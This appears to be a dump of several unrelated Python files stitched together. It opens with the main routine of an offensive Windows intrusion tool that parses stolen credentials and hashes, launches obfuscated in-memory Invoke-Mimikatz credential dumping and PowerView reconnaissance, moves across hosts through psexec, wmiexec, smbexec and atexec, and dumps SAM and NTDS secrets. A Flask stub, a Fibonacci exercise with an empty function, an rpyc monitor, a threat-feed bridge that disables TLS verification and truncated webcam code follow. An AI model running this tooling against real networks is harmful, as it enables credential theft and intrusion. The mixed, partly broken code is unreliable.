encoder = args.encoder
xml_targets = args.xml_targets
xml_exceptions = args.xml_exceptions
scan_tcp = args.scan_tcp
scan_syn = args.scan_syn
creds_file = args.creds_file
targets_list = []
exceptions_list = []
tgt_list = []
exc_list = []
LM = ""
NTLM = ""
no_output = False
execution = ""
supplement = ""
unprotected_command = ""
hash = None
methods = False
kerberos = False
attacks = True
method_dict = {}
dst = ""
test = ""
srv = None
verify_port = ''
verify_service = ''
entry = []
processed_xml_targets_dict = {}
processed_xml_exceptions_dict = {}
creds_list = []
creds_dict = {}
temp_key = None
SID_temp = None
LM_temp = ""
hash_temp = None
usr_temp = None
pwd_temp = None
NTLM_temp = ""
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
# Get details for catapult server
if payload != None:
cwd = str(os.path.dirname(payload))
if "/" not in cwd:
cwd = str(os.getcwd())
payload = os.path.basename(payload)
payload = ''.join(payload)
elif delivery == "web":
cwd = "/opt/ranger/web/"
elif delivery == "smb":
cwd = "/opt/ranger/smb/"
src_port = 445
if aes != None:
kerberos = True
#if filename:
# payload = filename
if smbexec_cmd or wmiexec_cmd or psexec_cmd or atexec_cmd:
methods = True
if scan_tcp:
scan_type = "tcp"
elif scan_syn:
scan_type = "syn"
else:
scan_type = None
if not (methods or sam_dump or netview_cmd) and (scan_type):
sys.exit("[!] If you are going to execute a verification scan you have to choose a method to use for exploiting a target")
if creds_file:
with open(creds_file) as f:
creds_list = f.readlines()
for cred in creds_list:
if cred and ":" in cred and cred.count(':') == 6:
if cred.count(' ') == 1:
cred = cred.rstrip()
hash_temp, dom_temp = cred.split(' ')
if "WORKGROUP" not in dom:
dom_temp = dom
SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp = pwd_test(hash_temp, verbose)
temp_key = "%s\%s" % (dom_temp, usr_temp)
print(temp_key) #DEBUG
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[0] = SID_temp
temp_list[1] = LM_temp
temp_list[2] = NTLM_temp
temp_list[3] = hash_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred.count(' ') == 0:
hash_temp = cred.rstrip()
dom_temp = dom
SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp = pwd_test(hash_temp, verbose)
temp_key = "%s\%s" % (dom_temp, usr_temp)
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[0] = SID_temp
temp_list[1] = LM_temp
temp_list[2] = NTLM_temp
temp_list[3] = hash_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred and ":" in cred and cred.count(':') == 1:
if cred.count(' ') == 1:
cred = cred.rstrip()
usr_temp, hash_temp = cred.split(' ')
dom_temp = dom
SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp = pwd_test(hash_temp, verbose, usr_temp, dom_temp)
temp_key = "%s\%s" % (dom_temp, usr_temp)
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[0] = SID_temp
temp_list[1] = LM_temp
temp_list[2] = NTLM_temp
temp_list[3] = hash_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred.count(' ') == 2:
cred = cred.rstrip()
usr_temp, pwd_temp, dom_temp = cred.sploit(' ')
temp_key = "%s\%s" % (dom_temp, usr_temp)
elif cred.count(' ') == 1:
cred = cred.rstrip()
dom_temp = dom
if "WORKGROUP" not in dom:
dom_temp = dom
usr_temp, pwd_temp = cred.split(' ')
temp_key = "%s\%s" % (dom_temp, usr_temp)
if not usr_temp:
sys.exit("[!] Hash %s does not have a username") % (hash_temp)
if temp_key in creds_dict:
temp_list = creds_dict[temp_key]
temp_list[4] = usr_temp
temp_list[5] = pwd_temp
else:
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
elif cred.count(' ') == 2:
cred = cred.rstrip()
usr_temp, pwd_temp, dom_temp = cred.split(' ')
if "WORKGROUP" not in dom:
dom_temp = dom
temp_key = "%s\%s" % (dom_temp, usr_temp)
creds_dict[temp_key] = [SID_temp, LM_temp, NTLM_temp, hash_temp, usr_temp, pwd_temp, dom_temp]
else:
sys.exit("[!] An error occured trying to parse the credential file")
if smbexec_cmd:
verify_port, verify_service = protocol.split('/')
if atexec_cmd:
verify_port, verify_service = protocol.split('/')
if psexec_cmd:
verify_port, verify_service = protocol.split('/')
if wmiexec_cmd:
verify_port = "135"
if sam_dump:
verify_port = "445"
if netview_cmd:
verify_port = "445"
if invoker == None and methods == False:
print("[!] This script requires either a command, an invoker attack, or a downloader attack")
parser.print_help()
sys.exit(1)
if pwd and ":" in pwd and not creds_dict:
SID, LM, NTLM, hash, usr, pwd = pwd_test(pwd, verbose, usr)
creds_dict_status = is_empty(creds_dict)
if smbexec_cmd or wmiexec_cmd or atexec_cmd or psexec_cmd or sam_dump:
method_dict = {"smbexec" : smbexec_cmd, "wmiexec" : wmiexec_cmd, "atexec" : atexec_cmd, "psexec" : psexec_cmd}
if not creds_dict and usr == None and pwd == None:
sys.exit("[!] If you are trying to exploit a system you need a username and password")
if target == None and target_filename == None and xml_targets == None:
sys.exit("[!] If you are trying to exploit a system you need at least one target")
gateways = get_gateways()
network_ifaces = get_networks(gateways)
if src_ip == None:
try:
src_ip = network_ifaces[interface]['addr']
except Exception, e:
print("[!] No IP address found on interface %s") % (interface)
if target_filename:
with open(target_filename) as f:
targets_list = [line.rstrip() for line in f]
if xml_targets:
processed_xml_targets_dict = xml_list_process(xml_targets, verbose)
if xml_exceptions:
processed_xml_exceptions_dict = xml_list_process(xml_exceptions, verbose)
for key, entry in processed_xml_targets_dict.iteritems():
if "tcp" in entry[2] and verify_port in entry[3] and "open" in entry[6]:
if verbose > 1:
print("[+] Adding %s to target list") % (entry[1])
targets_list.append(entry[1])
if verbose > 2:
print("[*] Hostname: %s IP: %s Protocol: %s Port: %s Service: %s State: %s MAC address: %s" % (entry[0], entry[1], entry[2], entry[3], entry[4], entry[6], entry[5]))
# Process targets
if target and "," in target:
targets_list.extend(target.split(','))
elif target:
targets_list.append(target)
if targets_list:
for item in targets_list:
try:
tgt = TargetConverter(item)
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
try:
tgt_list.extend(tgt.return_targets())
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
else:
tgt_list.extend(targets_list)
# Process exceptions
if exception_filename:
with open(exception_filename) as f:
exceptions_list = [line.rstrip() for line in f]
for key, entry in processed_xml_exceptions_dict.iteritems():
if "tcp" in entry[2] and verify_port in entry[3] and "open" in entry[6]:
if verbose > 1:
print("[+] Adding %s to exceptions list") % (entry[1])
targets_list.append(entry[1])
if verbose > 2:
print("[*] Hostname: %s IP: %s Protocol: %s Port: %s Service: %s State: %s MAC address: %s" % (entry[0], entry[1], entry[2], entry[3], entry[4], entry[6], entry[5]))
if exceptor and "," in exceptor:
exceptions_list.extend(targets.split(','))
elif exceptor:
exceptions_list.append(exceptor)
if exceptions_list:
for item in exceptions_list:
try:
exc = TargetConverter(item)
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
try:
exc_list.extend(exc.return_targets())
except Exception, e:
print("[!] The following error occurred %s") % (e)
sys.exit(1)
else:
exc_list.extend(exceptions_list)
exc_list.append(src_ip)
tgt_list = list(set(tgt_list))
exc_list = list(set(exc_list))
final_targets = [ip for ip in tgt_list if ip not in exc_list]
final_targets.sort()
if invoker:
execution = "invoker"
if mim_func == None:
mim_func = "Invoke-Mimikatz"
if mim_arg == None:
mim_arg = "-DumpCreds"
if payload == None:
payload = "im.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif executor:
if not payload or not mim_func:
sys.exit("[!] You must provide at least the name tool to be injected into memory and the cmdlet name to be executed")
execution = "executor"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif downloader:
if delivery == "smb":
sys.exit("[!] The Metasploit web_delivery module only works through web server based attacks")
execution = "downloader"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
elif domain_group:
execution = "domain_group"
domain_group = "'" + domain_group + "'"
if mim_func == None:
mim_func = "Get-NetGroup"
if mim_arg == None:
if not target_dom:
mim_arg = "-GroupName %s -Domain %s" % (domain_group, dom)
else:
mim_arg = "-GroupName %s -Domain %s" % (domain_group, target_dom)
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif local_group:
execution = "local_group"
local_group = "'" + local_group + "'"
if mim_func == None:
mim_func = "Get-NetLocalGroup"
if mim_arg == None:
mim_arg = "-GroupName %s" % (local_group)
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_domain:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetDomain"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_forest:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetForest"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_forest_domains:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetForestDomains"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif get_dc:
execution = "executor"
if mim_func == None:
mim_func = "Get-NetDomainControllers"
if payload == None:
payload = "pv.ps1"
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif find_local_admin_access:
execution = "executor"
if mim_func == None:
mim_func = "Invoke-FindLocalAdminAccess"
if payload == None:
payload = "pv.ps1"
if mim_arg == None:
if not target_dom:
if sleep_value > 0:
mim_arg = "-Domain %s -Delay %s" % (dom, sleep_value)
else:
mim_arg = "-Domain %s" % (dom)
else:
if sleep_value > 0:
mim_arg = "-Domain %s -Delay %s" % (target_dom, sleep_value)
else:
mim_arg = "-Domain %s" % (target_dom)
x = Obfiscator(src_ip, src_port, payload, mim_func, mim_arg, execution, method_dict, domain_group, delivery, share_name, dom, local_group)
command, unprotected_command = x.return_command()
attacks = True
elif netview_cmd:
attacks = True
elif sam_dump:
attacks = True
elif command:
attacks = False
else:
attacks = False
if not attacks and not methods:
sys.exit("[!] You need to provide ranger with details necessary to execute relevant attacks and methods")
instructions = instructions_func(payload, src_port, command, unprotected_command, smbexec_cmd, execution, delivery)
if methods and sam_dump:
sys.exit("[!] You do not execute the --secrets-dump with a method, it should be executed on its own.")
if not final_targets and not execution:
sys.exit("[!] No targets to exploit or commands to provide")
if creds_dict:
for key, value in creds_dict.iteritems():
SID = value[0]
LM = value[1]
NTLM = value[2]
hash = value[3]
usr = value[4]
pwd = value[5]
dom = value[6]
method_func(psexec_cmd, wmiexec_cmd, netview_cmd, smbexec_cmd, atexec_cmd, sam_dump, dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, final_targets, system, security, sam, ntds, no_output, encoder, timeout_value, sleep_value)
else:
method_func(psexec_cmd, wmiexec_cmd, netview_cmd, smbexec_cmd, atexec_cmd, sam_dump, dst, src_port, cwd, delivery, share_name, usr, hash, pwd, dom, command, unprotected_command, protocol, attacks, kerberos, aes, mode, share, instructions, directory, scan_type, verbose, verify_port, final_targets, system, security, sam, ntds, no_output, encoder, timeout_value, sleep_value)
if __name__ == '__main__':
main()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
exo2.py
|
#!/usr/bin/env python3
"""
An exemple of shared memory between processes
"""
from multiprocessing import Process, Manager
from sys import argv
def producer(number, fib_list):
"""
Returns the #num fibonacci number using recursion
:param number: current number
:param fib_list: pointer to shared list of fibonacci numbers
"""
# If the number has already been computed
if fib_list[number] != -1:
return fib_list[number]
if number <= 1:
fib_list[number] = number
else:
fib_list[number] = producer(number - 1, fib_list) + producer(number - 2, fib_list)
return fib_list[number]
def consumer():
if __name__ == "__main__":
if len(argv) == 2 and argv[1].isdigit() and int(argv[1]) >= 0:
with Manager() as manager:
num = int(argv[1])
fibs = manager.list([-1]*(num+1))
p = Process(target=producer, args=(num, fibs))
p.start()
p.join()
print(fibs)
|
server.py
|
import rpyc
import os
import time
from threading import Thread
class FileMonitorService(rpyc.Service):
class exposed_FileMonitor(object):
def __init__(self, filename, callback, interval = 1):
self.filename = filename
self.interval = interval
self.last_stat = None
self.callback = rpyc.async(callback) # make the callback async
self.active = True
self.thread = Thread(target = self.work)
self.thread.start()
def exposed_stop(self):
self.active = False
self.thread.join()
def work(self):
while self.active:
stat = os.stat(self.filename)
if self.last_stat is not None and self.last_stat != stat:
self.callback(self.last_stat, stat)
self.last_stat = stat
time.sleep(self.interval)
if __name__ == "__main__":
from rpyc.utils.server import ThreadedServer
ThreadedServer(FileMonitorService, port = 18871).start()
|
bridge.py
|
#
# Copyright 2013 CarbonBlack, Inc
#
import os
import sys
import time
from time import gmtime, strftime
import logging
from logging.handlers import RotatingFileHandler
import threading
import version
import cbint.utils.json
import cbint.utils.feed
import cbint.utils.flaskfeed
import cbint.utils.cbserver
import cbint.utils.filesystem
from cbint.utils.daemon import CbIntegrationDaemon
from Threatconnect import ThreatConnectFeedGenerator, ConnectionException
import traceback
from cbapi.response import CbResponseAPI, Feed
from cbapi.example_helpers import get_object_by_name_or_id
from cbapi.errors import ServerError
logger = logging.getLogger(__name__)
class CarbonBlackThreatConnectBridge(CbIntegrationDaemon):
def __init__(self, name, configfile, logfile=None, pidfile=None, debug=False):
CbIntegrationDaemon.__init__(self, name, configfile=configfile, logfile=logfile, pidfile=pidfile, debug=debug)
template_folder = "/usr/share/cb/integrations/cb-threatconnect-connector/content"
self.flask_feed = cbint.utils.flaskfeed.FlaskFeed(__name__, False, template_folder)
self.bridge_options = {}
self.bridge_auth = {}
self.api_urns = {}
self.validated_config = False
self.cb = None
self.sync_needed = False
self.feed_name = "threatconnectintegration"
self.display_name = "ThreatConnect"
self.feed = {}
self.directory = template_folder
self.cb_image_path = "/carbonblack.png"
self.integration_image_path = "/threatconnect.png"
self.integration_image_small_path = "/threatconnect-small.png"
self.json_feed_path = "/threatconnect/json"
self.feed_lock = threading.RLock()
self.logfile = logfile
self.flask_feed.app.add_url_rule(self.cb_image_path, view_func=self.handle_cb_image_request)
self.flask_feed.app.add_url_rule(self.integration_image_path, view_func=self.handle_integration_image_request)
self.flask_feed.app.add_url_rule(self.json_feed_path, view_func=self.handle_json_feed_request, methods=['GET'])
self.flask_feed.app.add_url_rule("/", view_func=self.handle_index_request, methods=['GET'])
self.flask_feed.app.add_url_rule("/feed.html", view_func=self.handle_html_feed_request, methods=['GET'])
self.initialize_logging()
logger.debug("generating feed metadata")
with self.feed_lock:
self.feed = cbint.utils.feed.generate_feed(
self.feed_name,
summary="Threat intelligence data provided by ThreatConnect to the Carbon Black Community",
tech_data="There are no requirements to share any data to receive this feed.",
provider_url="http://www.threatconnect.com/",
icon_path="%s/%s" % (self.directory, self.integration_image_path),
small_icon_path="%s/%s" % (self.directory, self.integration_image_small_path),
display_name=self.display_name,
category="Partner")
self.last_sync = "No sync performed"
self.last_successful_sync = "No sync performed"
def initialize_logging(self):
if not self.logfile:
log_path = "/var/log/cb/integrations/%s/" % self.name
cbint.utils.filesystem.ensure_directory_exists(log_path)
self.logfile = "%s%s.log" % (log_path, self.name)
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
root_logger.handlers = []
rlh = RotatingFileHandler(self.logfile, maxBytes=524288, backupCount=10)
rlh.setFormatter(logging.Formatter(fmt="%(asctime)s: %(module)s: %(levelname)s: %(message)s"))
root_logger.addHandler(rlh)
@property
def integration_name(self):
return 'Cb ThreatConnect Connector 1.2.9'
def serve(self):
if "https_proxy" in self.bridge_options:
os.environ['HTTPS_PROXY'] = self.bridge_options.get("https_proxy", "")
os.environ['no_proxy'] = '127.0.0.1,localhost'
address = self.bridge_options.get('listener_address', '127.0.0.1')
port = self.bridge_options['listener_port']
logger.info("starting flask server: %s:%s" % (address, port))
self.flask_feed.app.run(port=port, debug=self.debug,
host=address, use_reloader=False)
def handle_json_feed_request(self):
with self.feed_lock:
json = self.flask_feed.generate_json_feed(self.feed)
return json
def handle_html_feed_request(self):
with self.feed_lock:
html = self.flask_feed.generate_html_feed(self.feed, self.display_name)
return html
def handle_index_request(self):
with self.feed_lock:
index = self.flask_feed.generate_html_index(self.feed, self.bridge_options, self.display_name,
self.cb_image_path, self.integration_image_path,
self.json_feed_path, self.last_sync)
return index
def handle_cb_image_request(self):
return self.flask_feed.generate_image_response(image_path="%s%s" % (self.directory, self.cb_image_path))
def handle_integration_image_request(self):
return self.flask_feed.generate_image_response(image_path="%s%s" %
(self.directory, self.integration_image_path))
def run(self):
logger.info("starting Carbon Black <-> ThreatConnect Connector | version %s" % version.__version__)
logger.debug("starting continuous feed retrieval thread")
work_thread = threading.Thread(target=self.perform_continuous_feed_retrieval)
work_thread.setDaemon(True)
work_thread.start()
logger.debug("starting flask")
self.serve()
def validate_config(self):
self.validated_config = True
logger.info("Validating configuration file ...")
if 'bridge' in self.options:
self.bridge_options = self.options['bridge']
else:
logger.error("Configuration does not contain a [bridge] section")
return False
if 'auth' in self.options:
self.bridge_auth = self.options['auth']
else:
logger.error("configuration does not contain a [auth] section")
return False
if 'sources' in self.options:
self.api_urns = self.options["sources"]
else:
logger.error("configuration does not contain a [sources] section")
return False
opts = self.bridge_options
auth = self.bridge_auth
config_valid = True
msgs = []
if len(self.api_urns) <= 0:
msgs.append('No data sources are configured under [sources]')
config_valid = False
item = 'listener_port'
if not (item in opts and opts[item].isdigit() and 0 < int(opts[item]) <= 65535):
msgs.append('the config option listener_port is required and must be a valid port number')
config_valid = False
else:
opts[item] = int(opts[item])
item = 'listener_address'
if not (item in opts and opts[item] is not ""):
msgs.append('the config option listener_address is required and cannot be empty')
config_valid = False
item = 'feed_retrieval_minutes'
if not (item in opts and opts[item].isdigit() and 0 < int(opts[item])):
msgs.append('the config option feed_retrieval_minutes is required and must be greater than 1')
config_valid = False
else:
opts[item] = int(opts[item])
item = 'ioc_min_score'
if item in opts:
if not (opts[item].isdigit() and 0 <= int(opts[item]) <= 100):
msgs.append('The config option ioc_min_score must be a number in the range 0 - 100')
config_valid = False
else:
opts[item] = int(opts[item])
else:
logger.warning("No value provided for ioc_min_score. Using 1")
opts[item] = 1
item = 'api_key'
if not (item in auth and auth[item].isdigit()):
msgs.append('The config option api_key is required under section [auth] and must be a numeric value')
config_valid = False
item = 'url'
if not (item in auth and auth[item] is not ""):
msgs.append('The config option url is required under section [auth] and cannot be blank')
config_valid = False
if 'secret_key_encrypted' in auth and 'secret_key' not in auth:
msgs.append("Encrypted API secret key no longer supported. Use unencrypted 'secret_key' form.")
config_valid = False
elif 'secret_key' in auth and auth['secret_key'] != "":
auth['api_secret_key'] = self.bridge_auth.get("secret_key")
else:
msgs.append('The config option secret_key under section [auth] must be provided')
config_valid = False
# Convert all 1 or 0 values to true/false
opts["ignore_ioc_md5"] = opts.get("disable_ioc_md5", "0") == "1"
opts["ignore_ioc_ip"] = opts.get("disable_ioc_ip", "0") == "1"
opts["ignore_ioc_host"] = opts.get("disable_ioc_host", "0") == "1"
# create a cbapi instance
ssl_verify = self.get_config_boolean("carbonblack_server_sslverify", False)
server_url = self.get_config_string("carbonblack_server_url", "https://127.0.0.1")
server_token = self.get_config_string("carbonblack_server_token", "")
try:
self.cb = CbResponseAPI(url=server_url,
token=server_token,
ssl_verify=False,
integration_name=self.integration_name)
self.cb.info()
except:
logger.error(traceback.format_exc())
return False
if not config_valid:
for msg in msgs:
sys.stderr.write("%s\n" % msg)
logger.error(msg)
return False
else:
return True
def _filter_results(self, results):
logger.debug("Number of IOCs before filtering applied: %d", len(results))
opts = self.bridge_options
filter_min_score = opts["ioc_min_score"]
# Filter out those scores lower than the minimum score
if filter_min_score > 0:
results = filter(lambda x: x["score"] >= filter_min_score, results)
logger.debug("Number of IOCs after scores less than %d discarded: %d", filter_min_score,
len(results))
# For end user simplicity we call "dns" entries "host" and ipv4 entries "ip"
# format: {"flag_name" : ("official_name", "friendly_name")}
ignore_ioc_mapping = {"ignore_ioc_md5": ("md5", "md5"),
"ignore_ioc_ip": ("ipv4", "ip"),
"ignore_ioc_host": ("dns", "host")}
# On a per flag basis discard md5s, ips, or host if the user has requested we do so
# If we don't discard then check if an exclusions file has been specified and discard entries
# that match those in the exclusions file
for ignore_flag in ignore_ioc_mapping:
exclude_type = ignore_ioc_mapping[ignore_flag][0]
exclude_type_friendly_name = ignore_ioc_mapping[ignore_flag][1]
if opts[ignore_flag]:
results = filter(lambda x: exclude_type not in x["iocs"], results)
logger.debug("Number of IOCs after %s entries discarded: %d", exclude_type, len(results))
elif 'exclusions' in self.options and exclude_type_friendly_name in self.options['exclusions']:
file_path = self.options['exclusions'][exclude_type_friendly_name]
if not os.path.exists(file_path):
logger.debug("Exclusions file %s not found", file_path)
continue
with open(file_path, 'r') as exclude_file:
data = frozenset([line.strip() for line in exclude_file])
results = filter(lambda x: exclude_type not in x["iocs"] or x["iocs"][exclude_type][0] not in data,
results)
logger.debug("Number of IOCs after %s exclusions file applied: %d",
exclude_type_friendly_name, len(results))
return results
def perform_continuous_feed_retrieval(self, loop_forever=True):
try:
# config validation is critical to this connector working correctly
if not self.validated_config:
self.validate_config()
opts = self.bridge_options
auth = self.bridge_auth
while True:
logger.debug("Starting retrieval iteration")
try:
tc = ThreatConnectFeedGenerator(auth["api_key"], auth['api_secret_key'],
auth["url"], self.api_urns.items())
tmp = tc.get_threatconnect_iocs()
tmp = self._filter_results(tmp)
with self.feed_lock:
self.feed["reports"] = tmp
self.last_sync = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime())
self.last_successful_sync = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime())
logger.info("Successfully retrieved data at %s" % self.last_successful_sync)
except ConnectionException as e:
logger.error("Error connecting to Threat Connect: %s" % e.value)
self.last_sync = self.last_successful_sync + " (" + str(e.value) + ")"
if not loop_forever:
sys.stderr.write("Error connecting to Threat Connect: %s\n" % e.value)
sys.exit(2)
except Exception as e:
logger.error(traceback.format_exc())
time.sleep(opts.get('feed_retrieval_minutes') * 60)
# synchronize feed with Carbon Black server
if not "skip_cb_sync" in opts:
try:
feeds = get_object_by_name_or_id(self.cb, Feed, name=self.feed_name)
except Exception as e:
logger.error(e.message)
feeds = None
if not feeds:
logger.info("Feed {} was not found, so we are going to create it".format(self.feed_name))
f = self.cb.create(Feed)
f.feed_url = "http://{0}:{1}/threatconnect/json".format(
self.bridge_options.get('feed_host', '127.0.0.1'),
self.bridge_options.get('listener_port', '6100'))
f.enabled = True
f.use_proxy = False
f.validate_server_cert = False
try:
f.save()
except ServerError as se:
if se.error_code == 500:
logger.info("Could not add feed:")
logger.info(
" Received error code 500 from server. This is usually because the server cannot retrieve the feed.")
logger.info(
" Check to ensure the Cb server has network connectivity and the credentials are correct.")
else:
logger.info("Could not add feed: {0:s}".format(str(se)))
except Exception as e:
logger.info("Could not add feed: {0:s}".format(str(e)))
else:
logger.info("Feed data: {0:s}".format(str(f)))
logger.info("Added feed. New feed ID is {0:d}".format(f.id))
f.synchronize(False)
elif len(feeds) > 1:
logger.warning("Multiple feeds found, selecting Feed id {}".format(feeds[0].id))
elif feeds:
feed_id = feeds[0].id
logger.info("Feed {} was found as Feed ID {}".format(self.feed_name, feed_id))
feeds[0].synchronize(False)
logger.debug("ending feed retrieval loop")
# Function should only ever return when loop_forever is set to false
if not loop_forever:
return self.flask_feed.generate_json_feed(self.feed).data
time.sleep(opts.get('feed_retrieval_minutes') * 60)
except Exception:
# If an exception makes us exit then log what we can for our own sake
logger.fatal("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality! ")
logger.fatal("Fatal Error Encountered:\n %s" % traceback.format_exc())
sys.stderr.write("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!\n")
sys.stderr.write("Fatal Error Encountered:\n %s\n" % traceback.format_exc())
sys.exit(3)
# If we somehow get here the function is going to exit.
# This is not normal so we LOUDLY log the fact
logger.fatal("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!")
|
app_utils.py
|
# App Utils
import struct
import six
import collections
import cv2
import datetime
from threading import Thread
from matplotlib import colors
class FPS:
def __init__(self):
# Armazena a hora de início, o tempo de término e o número total de frames que foram examinados entre os intervalos de início e final
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# Start do timer
self._start = datetime.datetime.now()
return self
def stop(self):
# Stop do timer
self._end = datetime.datetime.now()
def update(self):
# Incrementar o número total de frames examinados durante o intervalos de início e fim
self._numFrames += 1
def elapsed(self):
# Devolve o número total de segundos entre o início e intervalo final
return (self._end - self._start).total_seconds()
def fps(self):
# Computa os frames (aproximados) por segundo
return self._numFrames / self.elapsed()
class WebcamVideoStream:
def __init__(self, src, width, height):
# Inicializa o fluxo da câmera de vídeo e lê o primeiro frame do fluxo
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# Inicializa a variável usada para indicar se o segmento deve seja parado
self.stopped = False
def start(self):
# Inicia o segmento para ler os frames do fluxo de vídeo
Thread(target=self.update, args=()).start()
return self
def update(self):
# Mantém o loop infinitamente até a thread parar
while True:
# Se a variável da thread da linha estiver definida, pare a thread
if self.stopped:
return
# Caso contrário, leia o próximo frame do fluxo
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Retorne o frame mais recentemente lido
return self.frame
def stop(self):
# Indica que a thread deve ser interrompida
self.stopped = True
def standard_colors():
colors = [
'AliceBlue', 'Chartreuse', 'Aqua', 'Aquamarine', 'Azure', 'Beige', 'Bisque',
'BlanchedAlmond', 'BlueViolet', 'BurlyWood', 'CadetBlue', 'AntiqueWhite',
'Chocolate', 'Coral', 'CornflowerBlue', 'Cornsilk', 'Crimson', 'Cyan',
'DarkCyan', 'DarkGoldenRod', 'DarkGrey', 'DarkKhaki', 'DarkOrange',
'DarkOrchid', 'DarkSalmon', 'DarkSeaGreen', 'DarkTurquoise', 'DarkViolet',
'DeepPink', 'DeepSkyBlue', 'DodgerBlue', 'FireBrick', 'FloralWhite',
'ForestGreen', 'Fuchsia', 'Gainsboro', 'GhostWhite', 'Gold', 'GoldenRod',
'Salmon', 'Tan', 'HoneyDew', 'HotPink', 'IndianRed', 'Ivory', 'Khaki',
'Lavender', 'LavenderBlush', 'LawnGreen', 'LemonChiffon', 'LightBlue',
'LightCoral', 'LightCyan', 'LightGoldenRodYellow', 'LightGray', 'LightGrey',
'LightGreen', 'LightPink', 'LightSalmon', 'LightSeaGreen', 'LightSkyBlue',
'LightSlateGray', 'LightSlateGrey', 'LightSteelBlue', 'LightYellow', 'Lime',
'LimeGreen', 'Linen', 'Magenta', 'MediumAquaMarine', 'MediumOrchid',
'MediumPurple', 'MediumSeaGreen', 'MediumSlateBlue', 'MediumSpringGreen',
'MediumTurquoise', 'MediumVioletRed', 'MintCream', 'MistyRose', 'Moccasin',
'NavajoWhite', 'OldLace', 'Olive', 'OliveDrab', 'Orange', 'OrangeRed',
'Orchid', 'PaleGoldenRod', 'PaleGreen', 'PaleTurquoise', 'PaleVioletRed',
'PapayaWhip', 'PeachPuff', 'Peru', 'Pink', 'Plum', 'PowderBlue', 'Purple',
'Red', 'RosyBrown', 'RoyalBlue', 'SaddleBrown', 'Green', 'SandyBrown',
'SeaGreen', 'SeaShell', 'Sienna', 'Silver', 'SkyBlue', 'SlateBlue',
'SlateGray', 'SlateGrey', 'Snow', 'SpringGreen', 'SteelBlue', 'GreenYellow',
'Teal', 'Thistle', 'Tomato', 'Turquoise', 'Violet', 'Wheat', 'White',
'WhiteSmoke', 'Yellow', 'YellowGreen'
]
return colors
def color_name_to_rgb():
colors_rgb = []
for key, value in colors.cnames.items():
colors_rgb.append((key, struct.unpack('BBB', bytes.fromhex(value.replace('#', '')))))
return dict(colors_rgb)
def draw_boxes_and_labels(
boxes,
